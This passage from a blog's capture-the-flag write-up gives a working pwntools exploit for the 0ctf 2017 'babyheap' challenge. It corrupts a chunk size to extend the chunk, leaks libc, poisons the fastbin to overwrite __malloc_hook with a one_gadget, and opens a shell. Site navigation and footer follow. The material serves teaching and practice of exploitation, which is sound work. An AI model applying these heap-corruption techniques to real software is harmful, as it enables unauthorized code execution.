class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'3'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br><br><span class="hljs-function"><span class="hljs-keyword">def</span> <span class="hljs-title">dump</span><span class="hljs-params">(index)</span>:</span><br>    io.recvuntil(<span class="hljs-string">"Command: "</span>)<br>    io.sendline(<span class="hljs-string">'4'</span>)<br>    io.recvuntil(<span class="hljs-string">"Index: "</span>)<br>    io.sendline(str(index))<br>    io.recvuntil(<span class="hljs-string">"Content: \n"</span>)<br>    data=io.recvline()<br>    <span class="hljs-keyword">return</span> data<br><br>alloc(<span class="hljs-number">0x18</span>)<br>alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number">0x18</span>)<br><br>payload=<span class="hljs-string">'A'</span>*<span class="hljs-number">0x18</span><br>payload+=p8(<span class="hljs-number">0xe1</span>)<br>fill(<span class="hljs-number">0</span>,payload)<br>free(<span class="hljs-number">1</span>)<br><br>alloc(<span class="hljs-number">0x68</span>)<br>leak=u64(dump(<span class="hljs-number">2</span>)[:<span class="hljs-number">8</span>])<br>libc=leak<span class="hljs-number">-0x3c4b78</span><br>__malloc_hook=libc+<span class="hljs-number">0x3c4b10</span><br>one_gadget=libc+<span class="hljs-number">0x4526a</span><br>log.info(<span class="hljs-string">"leak =&gt; 0x%x"</span> % leak)<br>log.info(<span class="hljs-string">"libc =&gt; 0x%x"</span> % libc)<br>log.info(<span class="hljs-string">"__malloc_hook =&gt; 0x%x"</span> % __malloc_hook)<br>log.info(<span class="hljs-string">"one_gadget =&gt; 0x%x"</span> % one_gadget)<br><br>alloc(<span class="hljs-number">0x68</span>)<br>free(<span class="hljs-number">2</span>)<br>payload=p64(__malloc_hook<span class="hljs-number">-0x23</span>)<br>fill(<span class="hljs-number">4</span>,payload)<br>alloc(<span class="hljs-number">0x68</span>)<br>alloc(<span class="hljs-number">0x68</span>)<br><br>payload=<span class="hljs-string">'b'</span>*<span class="hljs-number">0x13</span>+p64(one_gadget)<br>fill(<span class="hljs-number">5</span>,payload)<br><br>alloc(<span class="hljs-number">1</span>)<br>io.interactive()<br></code></pre></td></tr></tbody></table></figure>
<p><img src="/LawlietLW.github.io/2020/02/01/babyheap-0ctf-2017/14.jpg" alt=""><br>成功</p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
    </main>
    <footer class="post-footer">
      
      <div class="post-tags">
        
        <a class="post-tag button" href="/LawlietLW.github.io/tags/pwn/" rel="tag"><i class="fas fa-tags"></i>pwn</a>
        
        <a class="post-tag button" href="/LawlietLW.github.io/tags/%E5%A0%86/" rel="tag"><i class="fas fa-tags"></i>堆</a>
        
        <a class="post-tag button" href="/LawlietLW.github.io/tags/fastbin-attack/" rel="tag"><i class="fas fa-tags"></i>fastbin attack</a>
        
        <a class="post-tag button" href="/LawlietLW.github.io/tags/chunk-extend/" rel="tag"><i class="fas fa-tags"></i>chunk extend</a>
        
      </div>
      
    </footer>
  </article>
  
  
  <nav class="page-nav">
    <div class="page-nav-next page-nav-item">
      
      <a href="/LawlietLW.github.io/2020/01/30/buuctf-pwn1-sctf-2016/" rel="next" title="BUUCTF pwn1_sctf_2016"><i class="fas fa-angle-left"></i><span class="nav-title">BUUCTF pwn1_sctf_2016</span></a>
      
    </div>
    <div class="page-nav-prev page-nav-item">
      
      <a href="/LawlietLW.github.io/2020/02/09/hack-world/" rel="prev" title="Hack World"><span class="nav-title">Hack World</span><i class="fas fa-angle-right"></i></a>
      
    </div>
  </nav>
  
  
</div>

          </div>
          
          
          
<aside class="sidebar" id="sidebar" style="background: url(/LawlietLW.github.io/images/background.png);">
  
  <div class="search">
    <div class="form-group">
      <i class="fas fa-search"></i><input type="search" id="search-input" name="q" results="0" placeholder="搜索" class="form-control"/>
    </div>
  </div>
  <div class="search-result-box" id="search-result"></div>
  
  
<div class="info sidebar-item" id="info">
  
  <img class="author-avatar" src="/LawlietLW.github.io/images/1.jpeg" alt="Lock">
  
  <h1 class="author-name">Lock</h1>
  <h2 class="author-description"></h2>
  <div class="site-count">
    
    
    
    
    <div class="archives-count count-block">
      <div class="site-count-title">歸檔</div>
      <div><a href="/LawlietLW.github.io/archives/">23</a></div>
    </div>
    
    
    
    <div class="categories-count count-block">
      <div class="site-count-title">分類</div>
      <div><a href="/LawlietLW.github.io/categories/">5</a></div>
    </div>
    
    
    
    <div class="tags-count count-block">
      <div class="site-count-title">標籤</div>
      <div><a href="/LawlietLW.github.io/tags/">35</a></div>
    </div>
    
    
    
    
  </div>
  
  <div class="rss">
    <a class="rss-link button sidebar-item" href="/LawlietLW.github.io/atom.xml"><i class="fas fa-rss"></i>RSS</a>
  </div>
  
</div>


  <div class="sidebar-sticky">
    
    
    
    
    
    
    
    
    <hr>
    <div class="blogroll sidebar-item">
      <div><i class="fas fa-link"></i>友情鏈接</div>
      <ul>
        
        <li><i class="fas fa-link"></i><a href="https://www.smi1e.top/" target="_blank">Smi1e师傅</a></li>
        
        <li><i class="fas fa-link"></i><a href="https://www.mi1k7ea.com/" target="_blank">Mi1k7ea师傅</a></li>
        
        <li><i class="fas fa-link"></i><a href="https://prontosil.club/" target="_blank">prontosil师傅</a></li>
        
      </ul>
    </div>
    
  </div>
</aside>


          
        </div>
      </div>
    </main>
    
<footer id="footer" class="footer" style="background: #33363b;">
  <div class="container">
    <div class="back-to-top">
      <button id="back-to-top"><i class="fas fa-angle-double-up" aria-label="回到頂部"></i></button>
    </div>
    <div class="footer-container">
      <div class="footer-left">
        <div class="copyright">
          <span class="author">Lock</span><span class="year"><i class="far fa-copyright"></i>2020</span>
        </div>
        
        <div class="busuanzi">
          <span id="busuanzi_container_site_pv"><i class="fas fa-eye" aria-label="站點訪問量" aria-hidden="false"></i><span id="busuanzi_value_site_pv"></span></span><span id="busuanzi_container_site_uv"><i class="fas fa-user" aria-label="站點用戶數" aria-hidden="false"></i><span id="busuanzi_value_site_uv"></span></span><span id="busuanzi_container_page_pv"><i class="far fa-file-alt"></i><span id="busuanzi_value_page_pv" aria-label="頁面訪問量" aria-hidden="false"></span></span>
        </div>
        
      </div>
      <div class="footer-right">
        <div class="custom-info">
          
          托管于<i class="fab fa-github-alt"></i><a href="https://pages.github.com/" target="_blank">GitHub Pages</a>
          
        </div>
        <div class="powered-by">
          由 <a href="https://hexo.io/" target="_blank">Hexo</a> 強力驅動 | 主題 <a href="https://github.com/AlynxZhou/hexo-theme-aria/" target="_blank">ARIA</a>
        </div>
      </div>
    </div>
  </div>
</footer>


  </body>
</html>
